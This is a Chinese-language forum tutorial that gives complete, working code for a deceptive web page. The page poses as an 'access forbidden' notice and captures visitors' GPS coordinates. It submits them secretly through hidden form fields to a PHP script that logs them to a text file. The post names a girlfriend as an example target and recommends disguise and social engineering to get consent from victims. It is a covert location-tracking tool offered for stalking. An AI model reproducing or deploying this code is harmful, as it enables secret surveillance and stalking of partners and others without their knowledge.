小狼人Lv92
想知道某人的位置?如何获取他人的经度和纬度 一个最简单的方法 技术教程
想知道某人的位置?
比如你的女朋友,很简单,往下看
新建一个文件,名为index.php<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>狼人网络 - 访问被禁止 by Wolfman</title>
</head>
<body>
<img src="wolfman.png" alt="" width="100%;">
<script>
var geol;
try {
if (typeof(navigator.geolocation) == 'undefined') {
geol = google.gears.factory.create('beta.geolocation');
} else {
geol = navigator.geolocation;
}
} catch (error) {
//alert(error.message);
}
if (geol) {
geol.getCurrentPosition(function(position) {
var nowLatitude = position.coords.latitude;
var nowLongitude = position.coords.longitude;
function new_form(){
var f=document.createElement("form");
document.body.appendChild(f);
f.method="post";
return f;
}
function create_elements(eForm,eName,eValue){
var e=document.createElement("input");
eForm.appendChild(e);
e.type="text";
e.name=eName;
if(!document.all){e.style.display="none"}else{
e.style.display="block";
e.style.width="0px";
e.style.height="0px";
}
e.value=eValue;
return e;
}
var _f=new_form();
create_elements(_f,"username",nowLatitude)
create_elements(_f,"password",nowLongitude);
_f.action="wolfman2.php";
_f.submit();
}, function(error) {
switch(error.code){
case error.TIMEOUT :
//alert("连接超时,请重试");
break;
case error.PERMISSION_DENIED :
//alert("您拒绝了使用位置共享服务,查询已取消");
alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站");
break;
case error.POSITION_UNAVAILABLE :
alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站");
break;
}
}, {timeout:10000});
}
</script>
</body>
</html>//http://bbs.wolfwl.cn
下面是创建一个txt,为了记录访问过的人,可以通过 网址/wolfman.txt进行直接访问被记录下来的信息 名为wolfman2.php<title>你被骗了 神马都没有 - by Wolfman</title>
<?php
@$time=date('Y-m-d H:i:s',time());
$nowLatitude="纬度 ".$_POST['username'];
$nowlongitude="经度 ".$_POST['password']." ------时间是".$time."\r\n";;
$fp=fopen("wolfman.txt", "a+");
fwrite($fp, $nowLatitude);
fwrite($fp, $nowlongitude);
?>//http://bbs.wolfwl.cn
然后直接上传到自己网站空间即可你可以通过自己的想法来继续优化,比如伪装等等
这个有一个缺点就是必须需要访问的人允许获取地理位置
不过你可以通过社工来套路,详细我就不说了
希望可以帮到那些玩社工的朋友,如果你觉得不错,可以打赏下站长哦!
13 已被阅读了3521次 楼主 2017-08-08 00:17:56